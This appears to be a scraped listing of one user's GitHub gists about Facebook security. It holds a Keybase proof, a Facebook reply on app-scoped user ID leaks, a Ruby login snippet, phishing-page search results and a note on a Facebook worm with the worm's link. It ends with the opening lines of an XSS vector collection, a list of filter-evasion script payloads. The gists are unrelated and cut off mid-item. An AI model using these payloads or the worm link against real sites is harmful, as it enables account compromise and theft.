Keybase proof

I hereby claim:

  • I am phwd on github.
  • I am phwd (https://keybase.io/phwd) on keybase.
  • I have a public key whose fingerprint is E782 8CF3 2CEB D621 EF7A 22AD 3A1D DCCA B2A1 1AD5

To claim this, I am signing this object:

Response from Facebook
As you saw, the Facebook API is now versioned: https://developers.facebook.com/docs/apps/versions. That means any apps created today can only make requests to the v2 API, but apps created before the announcement can make requests to the v1 API until it expires as well as to the v2 API. That’s a necessary step since an application can’t always upgrade to v2 of the API in one synchronous step (i.e., if a single app ID powers a number of mobile apps as well as a web app). To support that behavior, we support app-scoped UIDs even via the v1 API. And that’s where we run into problems 😉
Generally speaking, you identified three potential issues:
  1. Given an app-scoped UID for v2 app X, it is possible to make requests to the v1 API with a v1 app Y and get back data.
  2. Given an app-scoped UID, you can browse to https://www.facebook.com/app_scoped_user_id/APP-SCOPED-UID and trivially see the real user.
  3. http://graph.facebook.com/APP-SCOPED-UID returns information about the user
The behavior in #1/#3 w
@phwd
phwd / app.rb
Last active August 29, 2015 14:23 — forked from will3942/app.rb
require 'openssl'
require 'base64'
require 'json'
require 'httpclient'
http = HTTPClient.new(:agent_name => useragent)
key = "" #The Private key
login_info = {:guid => "00000000-0000-0000-0000-000000000000",
:password => "PASSWORD",
:username => "USERNAME",
@phwd
phwd / p.json
Created July 24, 2015 19:07
Phishers gonna phish
{
"pages-named(Facebook Security)": {
"url": "https://www.facebook.com/search/str/Facebook%2BSecurity/pages-named",
"results": {
"count": 177,
"nodes": [
{
"id": "31987371885",
"url": "https://www.facebook.com/security",
"name": "Facebook Security",
@phwd
phwd / gist:f1990aeff9d17152b3f6
Last active January 6, 2016 14:58 — forked from grigs/gist:e4ea58be46134cdb0729
Facebook Instant Article JSON Buzzfeed Example
{
"700554543387711": {
"id": "700554543387711",
"latest_version": {
"id": "455210147987840",
"article_canonical_url": "http:\/\/www.buzzfeed.com\/expresident\/steps-to-instantly-improve-your-day",
"article_version_number": 2,
"cover_media": {
"__type__": {
"name": "DocumentVideoElement"
9 dir 117150 svn+ssh://tubbs/svnroot/tfb/releases/thefacebook-r116496-fb95/www/lib/display/privacy svn+ssh://tubbs/svnroot 2008-08-05T21:47:04.536211Z 114218 chad svn:special svn:externals svn:needs-lock 2c7ba8d8-a2f7-0310-a573-de162e16dcc7 pages.php file 2008-08-18T18:50:32.000000Z e69ad78841111ae71df858b23a4d356c 2008-08-05T21:47:04.536211Z 114218 chad 8328

I did a bit of initial OAuth research this week for FxA (Firefox Accounts). It was interrupted by more pressing stuff (bugs bugs bugs), but thought I'd post my incomplete work-in-progress notes for whenever I get back to this.

Notes come from Getting Started with OAuth 2.0, which I accessed via Safari.

my next steps:

  • look carefully at a number of JS SDKs
  • think in terms of a generic OAuth abstraction for FxOS
  • but begin by building the simplest possible solution for FxA on FxOS
    • we really need implicit grant,
  • and a proxy server that could handle redirects on behalf of serverless apps,
@phwd
phwd / LICENSE.txt
Created April 6, 2016 13:08 — forked from dfreedm/LICENSE.txt
Facebook Profile Finder in 139 bytes
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
@phwd
phwd / wormwormworm.txt
Last active April 18, 2023 13:36
Digging into a Facebook Worm
http://i.imgur.com/zc2A8vJ.png
Facebook worms are interesting
The following was a link that was shared to me (You probably shouldn't click it)
https://www.facebook.com/l.php?u=https%3A%2F%2Fcdn.fbsbx.com%2Fhphotos-xpa1%2Fv%2Ft59.2708-21%2F12447002_1746605272238633_1642381431_n.html%2FV1DE0-9682.html%3Foh%3D8a665fb34c8793a92fd02cceb31d4b01%26oe%3D5718116B%26dl%3D1&h=cAQHPcYE7
@phwd
phwd / 666_lines_of_XSS_vectors.html
Created July 27, 2016 17:30 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>